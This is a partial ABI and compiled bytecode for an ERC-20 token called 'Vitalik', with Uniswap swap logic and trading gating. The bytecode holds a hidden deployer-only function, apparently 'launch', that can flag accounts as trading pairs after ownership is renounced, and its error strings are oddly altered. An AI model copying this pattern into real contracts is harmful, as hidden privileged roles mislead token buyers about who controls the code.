}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromEnobleTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"foundationWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"launch","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"liquidityWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tradingEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

60a06040523480156200001157600080fd5b506040518060400160405280600781526020017f566974616c696b000000000000000000000000000000000000000000000000008152506040518060400160405280600781526020017f566974616c696b0000000000000000000000000000000000000000000000000081525081600590816200008f9190620009f0565b508060069081620000a19190620009f0565b503373ffffffffffffffffffffffffffffffffffffffff166004819055505050620000e1620000d56200033660201b60201c565b6200033e60201b60201c565b60006a52b7d2dcc80cd2e40000009050737a250d5630b4cf539739df2c5dacb4c659f2488d73ffffffffffffffffffffffffffffffffffffffff1660808173ffffffffffffffffffffffffffffffffffffffff16815250506200016e306080517fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff6200040460201b60201c565b6000600e819055506000600f819055506000601081905550601054600f54600e546200019b919062000b06565b620001a7919062000b06565b600d81905550600060128190555060006013819055506000601481905550601454601354601254620001da919062000b06565b620001e6919062000b06565b6011819055506011546018819055506001601960006200020b620005d560201b60201c565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506001601960003073ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff02191690831515021790555060016019600061dead73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055506200032f62000322620005d560201b60201c565b82620005ff60201b60201c565b5062000d48565b600033905090565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff160362000476576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200046d9062000bc8565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603620004e8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620004df9062000c60565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051620005c8919062000c93565b60405180910390a3505050565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000671576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620006689062000d26565b60405180910390fd5b62000685600083836200076c60201b60201c565b806002600082825462000699919062000b06565b92505081905550806000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200074c919062000c93565b60405180910390a362000768600083836200077160201b60201c565b5050565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680620007f857607f821691505b6020821081036200080e576200080d620007b0565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620008787fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000839565b62000884868362000839565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b6000620008d1620008cb620008c5846200089c565b620008a6565b6200089c565b9050919050565b6000819050919050565b620008ed83620008b0565b62000905620008fc82620008d8565b84845462000846565b825550505050565b600090565b6200091c6200090d565b62000929818484620008e2565b505050565b5b8181101562000951576200094560008262000912565b6001810190506200092f565b5050565b601f821115620009a0576200096a8162000814565b620009758462000829565b8101602085101562000985578190505b6200099d620009948562000829565b8301826200092e565b50505b505050565b600082821c905092915050565b6000620009c560001984600802620009a5565b1980831691505092915050565b6000620009e08383620009b2565b9150826002028217905092915050565b620009fb8262000776565b67ffffffffffffffff81111562000a175762000a1662000781565b5b62000a238254620007df565b62000a3082828562000955565b600060209050601f83116001811462000a68576000841562000a53578287015190505b62000a5f8582620009d2565b86555062000acf565b601f19841662000a788662000814565b60005b8281101562000aa25784890151825560018201915060208501945060208101905062000a7b565b8683101562000ac2578489015162000abe601f891682620009b2565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600062000b13826200089c565b915062000b20836200089c565b925082820190508082111562000b3b5762000b3a62000ad7565b5b92915050565b600082825260208201905092915050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600062000bb060248362000b41565b915062000bbd8262000b52565b604082019050919050565b6000602082019050818103600083015262000be38162000ba1565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600062000c4860228362000b41565b915062000c558262000bea565b604082019050919050565b6000602082019050818103600083015262000c7b8162000c39565b9050919050565b62000c8d816200089c565b82525050565b600060208201905062000caa600083018462000c82565b92915050565b7f45524332303a206d696e7420746f20746865207a65726f20566974616c696b2060008201527f6164647265737300000000000000000000000000000000000000000000000000602082015250565b600062000d0e60278362000b41565b915062000d1b8262000cb0565b604082019050919050565b6000602082019050818103600083015262000d418162000cff565b9050919050565b60805161304a62000d87600039600081816107b801528181611e7601528181611f5701528181611f7e0152818161201a0152612041015261304a6000f3fe6080604052600436106101c65760003560e01c80636ddd1713116100f757806395d89b4111610095578063d469801611610064578063d469801614610645578063dd62ed3e14610670578063e2f45605146106ad578063f2fde38b146106d8576101cd565b806395d89b4114610575578063a457c2d7146105a0578063a9059cbb146105dd578063ccc56ccc1461061a576101cd565b806375f0a874116100d157806375f0a874146104dd5780638a8c523c146105085780638da5cb5b1461051f57806393ec52de1461054a576101cd565b80636ddd17131461045e57806370a0823114610489578063715018a6146104c6576101cd565b806327c8f8351161016457806349bd5a5e1161013e57806349bd5a5e146103b25780634ada218b146103dd5780636620cec9146104085780636b7ae8dc14610433576101cd565b806327c8f8351461031f578063313ce5671461034a5780633950935114610375576101cd565b806318160ddd116101a057806318160ddd14610265578063182073a414610290578063214013ca146102b957806323b872dd146102e2576101cd565b806306fdde03146101d2578063095ea7b3146101fd5780631694505e1461023a576101cd565b366101cd57005b600080fd5b3480156101de57600080fd5b506101e7610701565b6040516101f491906121a0565b60405180910390f35b34801561020957600080fd5b50610224600480360381019061021f919061225b565b610793565b60405161023191906122b6565b60405180910390f35b34801561024657600080fd5b5061024f6107b6565b60405161025c9190612330565b60405180910390f35b34801561027157600080fd5b5061027a6107da565b604051610287919061235a565b60405180910390f35b34801561029c57600080fd5b506102b760048036038101906102b291906123a1565b6107e4565b005b3480156102c557600080fd5b506102e060048036038101906102db91906123e1565b610895565b005b3480156102ee57600080fd5b506103096004803603810190610304919061240e565b6108ab565b60405161031691906122b6565b60405180910390f35b34801561032b57600080fd5b506103346108da565b6040516103419190612470565b60405180910390f35b34801561035657600080fd5b5061035f6108e0565b60405161036c91906124a7565b60405180910390f35b34801561038157600080fd5b5061039c6004803603810190610397919061225b565b6108e9565b6040516103a991906122b6565b60405180910390f35b3480156103be57600080fd5b506103c7610920565b6040516103d49190612470565b60405180910390f35b3480156103e957600080fd5b506103f2610946565b6040516103ff91906122b6565b60405180910390f35b34801561041457600080fd5b5061041d610959565b60405161042a919061235a565b60405180910390f35b34801561043f57600080fd5b5061044861095f565b6040516104559190612470565b60405180910390f35b34801561046a57600080fd5b50610473610985565b60405161048091906122b6565b60405180910390f35b34801561049557600080fd5b506104b060048036038101906104ab91906123e1565b610998565b6040516104bd919061235a565b60405180910390f35b3480156104d257600080fd5b506104db6109e0565b005b3480156104e957600080fd5b506104f26109f4565b6040516104ff9190612470565b60405180910390f35b34801561051457600080fd5b5061051d610a1a565b005b34801561052b57600080fd5b50610534610aaa565b6040516105419190612470565b60405180910390f35b34801561055657600080fd5b5061055f610ad4565b60405161056c919061235a565b60405180910390f35b34801561058157600080fd5b5061058a610ada565b60405161059791906121a0565b60405180910390f35b3480156105ac57600080fd5b506105c760048036038101906105c2919061225b565b610b6c565b6040516105d491906122b6565b60405180910390f35b3480156105e957600080fd5b5061060460048036038101906105ff919061225b565b610be3565b60405161061191906122b6565b60405180910390f35b34801561062657600080fd5b5061062f610c06565b60405161063c919061235a565b60405180910390f35b34801561065157600080fd5b5061065a610c0c565b6040516106679190612470565b60405180910390f35b34801561067c57600080fd5b50610697600480360381019061069291906124c2565b610c32565b6040516106a4919061235a565b60405180910390f35b3480156106b957600080fd5b506106c2610cb9565b6040516106cf919061235a565b60405180910390f35b3480156106e457600080fd5b506106ff60048036038101906106fa91906123e1565b610cbf565b005b60606005805461071090612531565b80601f016020809104026020016040519081016040528092919081815260200182805461073c90612531565b80156107895780601f1061075e57610100808354040283529160200191610789565b820191906000526020600020905b81548152906001019060200180831161076c57829003601f168201915b5050505050905090565b60008061079e610d42565b90506107ab818585610d4a565b600191505092915050565b7f000000000000000000000000000000000000000000000000000000000000000081565b6000600254905090565b6107ec610f13565b80601960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df78260405161088991906122b6565b60405180910390a25050565b61089d610f91565b6108a8816001610fb7565b50565b6000806108b6610d42565b90506108c3858285611058565b6108ce8585856110e4565b60019150509392505050565b61dead81565b60006012905090565b6000806108f4610d42565b90506109158185856109068589610c32565b6109109190612591565b610d4a565b600191505092915050565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600b60149054906101000a900460ff1681565b60115481565b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b600b60159054906101000a900460ff1681565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6109e8610f13565b6109f260006117ba565b565b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b610a22610f13565b600b60149054906101000a900460ff1615610a72576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a6990612611565b60405180910390fd5b6001600b60146101000a81548160ff0219169083151502179055506001600b60156101000a81548160ff021916908315150217905550565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60035481565b606060068054610ae990612531565b80601f0160208091040260200160405190810160405280929190818152602001828054610b1590612531565b8015610b625780601f10610b3757610100808354040283529160200191610b62565b820191906000526020600020905b815481529060010190602001808311610b4557829003601f168201915b5050505050905090565b600080610b77610d42565b90506000610b858286610c32565b905083811015610bca576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bc1906126a3565b60405180910390fd5b610bd78286868403610d4a565b60019250505092915050565b600080610bee610d42565b9050610bfb8185856110e4565b600191505092915050565b600d5481565b600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600c5481565b610cc7610f13565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610d36576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610d2d90612735565b60405180910390fd5b610d3f816117ba565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610db9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610db0906127c7565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610e28576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e1f90612859565b60405180910390fd5b80600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610f06919061235a565b60405180910390a3505050565b610f1b610d42565b73ffffffffffffffffffffffffffffffffffffffff16610f39610aaa565b73ffffffffffffffffffffffffffffffffffffffff1614610f8f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610f86906128c5565b60405180910390fd5b565b3373ffffffffffffffffffffffffffffffffffffffff1660045414610fb557600080fd5b565b80601a60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b60006110648484610c32565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146110de57818110156110d0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016110c790612931565b60405180910390fd5b6110dd8484848403610d4a565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603611153576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161114a906129c3565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16036111c2576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016111b990612a55565b60405180910390fd5b600b60149054906101000a900460ff16806112265750601960008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b8061127a5750601960008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b6112b9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016112b090612ac1565b60405180910390fd5b600081036112d2576112cd83836000611880565b6117b5565b60006112dd30610998565b90506000600c5482101590508080156113025750600b60159054906101000a900460ff165b801561131b5750600b60169054906101000a900460ff16155b80156113705750601a60008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b80156113c65750601960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b801561141c5750601960008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16155b15611461576001600b60166101000a81548160ff02191690831515021790555061144582611af6565b6000600b60166101000a81548160ff0219169083151502179055505b6000600b60169054906101000a900460ff16159050601960008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16806115175750601960008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff165b1561152157600090505b6000811561179c57601a60008773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff16801561158457506000601154115b15611652576115b26127106115a460115488611d8b90919063ffffffff16565b611da190919063ffffffff16565b9050601154601454826115c59190612ae1565b6115cf9190612b52565b601760008282546115e09190612591565b92505081905550601154601254826115f89190612ae1565b6116029190612b52565b601560008282546116139190612591565b925050819055506011546013548261162b9190612ae1565b6116359190612b52565b601660008282546116469190612591565b92505081905550611778565b601a60008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060009054906101000a900460ff1680156116ad57506000601154115b15611777576116db6127106116cd60115488611d8b90919063ffffffff16565b611da190919063ffffffff16565b9050600d54601054826116ee9190612ae1565b6116f89190612b52565b601760008282546117099190612591565b92505081905550600d54600e54826117219190612ae1565b61172b9190612b52565b6015600082825461173c9190612591565b92505081905550600d54600f54826117549190612ae1565b61175e9190612b52565b6016600082825461176f9190612591565b925050819055505b5b600081111561178d5761178c873083611880565b5b80856117999190612b83565b94505b6117a7878787611880565b601854601181905550505050505b505050565b6000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036118ef576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016118e690612c29565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361195e576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161195590612a55565b60405180910390fd5b611969838383611db7565b60008060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050818110156119ef576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016119e690612cbb565b60405180910390fd5b8181036000808673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051611add919061235a565b60405180910390a3611af0848484611dbc565b50505050565b6000601654601554601754611b0b9190612591565b611b159190612591565b905060008060028360175486611b2b9190612ae1565b611b359190612b52565b611b3f9190612b52565b90506000611b568286611dc190919063ffffffff16565b90506000479050611b6682611dd7565b6000611b7b8247611dc190919063ffffffff16565b90506000611ba687611b9860155485611d8b90919063ffffffff16565b611da190919063ffffffff16565b90506000611bd188611bc360165486611d8b90919063ffffffff16565b611da190919063ffffffff16565b90506000818385611be29190612b83565b611bec9190612b83565b9050600060178190555060006015819055506000601681905550600087118015611c165750600081115b15611c6357611c258782612014565b7f17bbfb9a6069321b6ded73bd96327c9e6b7212a5cd51ff219cd61370acafb5618682601754604051611c5a93929190612cdb565b60405180910390a15b600a60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1682604051611ca990612d43565b60006040518083038185875af1925050503d8060008114611ce6576040519150601f19603f3d011682016040523d82523d6000602084013e611ceb565b606091505b505080985050600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1647604051611d3790612d43565b60006040518083038185875af1925050503d8060008114611d74576040519150601f19603f3d011682016040523d82523d6000602084013e611d79565b606091505b50508098505050505050505050505050565b60008183611d999190612ae1565b905092915050565b60008183611daf9190612b52565b905092915050565b505050565b505050565b60008183611dcf9190612b83565b905092915050565b6000600267ffffffffffffffff811115611df457611df3612d58565b5b604051908082528060200260200182016040528015611e225781602001602082028036833780820191505090505b5090503081600081518110611e3a57611e39612d87565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff16815250507f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015611edf573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611f039190612dcb565b81600181518110611f1757611f16612d87565b5b602002602001019073ffffffffffffffffffffffffffffffffffffffff16908173ffffffffffffffffffffffffffffffffffffffff1681525050611f7c307f000000000000000000000000000000000000000000000000000000000000000084610d4a565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663791ac9478360008430426040518663ffffffff1660e01b8152600401611fde959493929190612ef1565b600060405180830381600087803b158015611ff857600080fd5b505af115801561200c573d6000803e3d6000fd5b505050505050565b61203f307f000000000000000000000000000000000000000000000000000000000000000084610d4a565b7f000000000000000000000000000000000000000000000000000000000000000073ffffffffffffffffffffffffffffffffffffffff1663f305d719823085600080600b60009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16426040518863ffffffff1660e01b81526004016120c696959493929190612f4b565b60606040518083038185885af11580156120e4573d6000803e3d6000fd5b50505050506040513d601f19601f820116820180604052508101906121099190612fc1565b5050505050565b600081519050919050565b600082825260208201905092915050565b60005b8381101561214a57808201518184015260208101905061212f565b60008484015250505050565b6000601f19601f8301169050919050565b600061217282612110565b61217c818561211b565b935061218c81856020860161212c565b61219581612156565b840191505092915050565b600060208201905081810360008301526121ba8184612167565b905092915050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006121f2826121c7565b9050919050565b612202816121e7565b811461220d57600080fd5b50565b60008135905061221f816121f9565b92915050565b6000819050919050565b61223881612225565b811461224357600080fd5b50565b6000813590506122558161222f565b92915050565b60008060408385031215612272576122716121c2565b5b600061228085828601612210565b925050602061229185828601612246565b9150509250929050565b60008115159050919050565b6122b08161229b565b82525050565b60006020820190506122cb60008301846122a7565b92915050565b6000819050919050565b60006122f66122f16122ec846121c7565b6122d1565b6121c7565b9050919050565b6000612308826122db565b9050919050565b600061231a826122fd565b9050919050565b61232a8161230f565b82525050565b60006020820190506123456000830184612321565b92915050565b61235481612225565b82525050565b600060208201905061236f600083018461234b565b92915050565b61237e8161229b565b811461238957600080fd5b50565b60008135905061239b81612375565b92915050565b600080604083850312156123b8576123b76121c2565b5b60006123c685828601612210565b92505060206123d78582860161238c565b9150509250929050565b6000602082840312156123f7576123f66121c2565b5b600061240584828501612210565b91505092915050565b600080600060608486031215612427576124266121c2565b5b600061243586828701612210565b935050602061244686828701612210565b925050604061245786828701612246565b9150509250925092565b61246a816121e7565b82525050565b60006020820190506124856000830184612461565b92915050565b600060ff82169050919050565b6124a18161248b565b82525050565b60006020820190506124bc6000830184612498565b92915050565b600080604083850312156124d9576124d86121c2565b5b60006124e785828601612210565b92505060206124f885828601612210565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061254957607f821691505b60208210810361255c5761255b612502565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061259c82612225565b91506125a783612225565b92508282019050808211156125bf576125be612562565b5b92915050565b7f54726164696e6720616c7265616479206163746976652e000000000000000000600082015250565b60006125fb60178361211b565b9150612606826125c5565b602082019050919050565b6000602082019050818103600083015261262a816125ee565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061268d60258361211b565b915061269882612631565b604082019050919050565b600060208201905081810360008301526126bc81612680565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061271f60268361211b565b915061272a826126c3565b604082019050919050565b6000602082019050818103600083015261274e81612712565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b60006127b160248361211b565b91506127bc82612755565b604082019050919050565b600060208201905081810360008301526127e0816127a4565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b600061284360228361211b565b915061284e826127e7565b604082019050919050565b6000602082019050818103600083015261287281612836565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006128af60208361211b565b91506128ba82612879565b602082019050919050565b600060208201905081810360008301526128de816128a2565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061291b601d8361211b565b9150612926826128e5565b602082019050919050565b6000602082019050818103600083015261294a8161290e565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006129ad60258361211b565b91506129b882612951565b604082019050919050565b600060208201905081810360008301526129dc816129a0565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000612a3f60238361211b565b9150612a4a826129e3565b604082019050919050565b60006020820190508181036000830152612a6e81612a32565b9050919050565b7f54726164696e67206e6f7420566974616c696b2079657420656e61626c656421600082015250565b6000612aab60208361211b565b9150612ab682612a75565b602082019050919050565b60006020820190508181036000830152612ada81612a9e565b9050919050565b6000612aec82612225565b9150612af783612225565b9250828202612b0581612225565b91508282048414831517612b1c57612b1b612562565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000612b5d82612225565b9150612b6883612225565b925082612b7857612b77612b23565b5b828204905092915050565b6000612b8e82612225565b9150612b9983612225565b9250828203905081811115612bb157612bb0612562565b5b92915050565b7f45524332303a207472616e736665722066726f6d2074686520566974616c696b60008201527f207a65726f206164647265737300000000000000000000000000000000000000602082015250565b6000612c13602d8361211b565b9150612c1e82612bb7565b604082019050919050565b60006020820190508181036000830152612c4281612c06565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000612ca560268361211b565b9150612cb082612c49565b604082019050919050565b60006020820190508181036000830152612cd481612c98565b9050919050565b6000606082019050612cf0600083018661234b565b612cfd602083018561234b565b612d0a604083018461234b565b949350505050565b600081905092915050565b50565b6000612d2d600083612d12565b9150612d3882612d1d565b600082019050919050565b6000612d4e82612d20565b9150819050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050612dc5816121f9565b92915050565b600060208284031215612de157612de06121c2565b5b6000612def84828501612db6565b91505092915050565b6000819050919050565b6000612e1d612e18612e1384612df8565b6122d1565b612225565b9050919050565b612e2d81612e02565b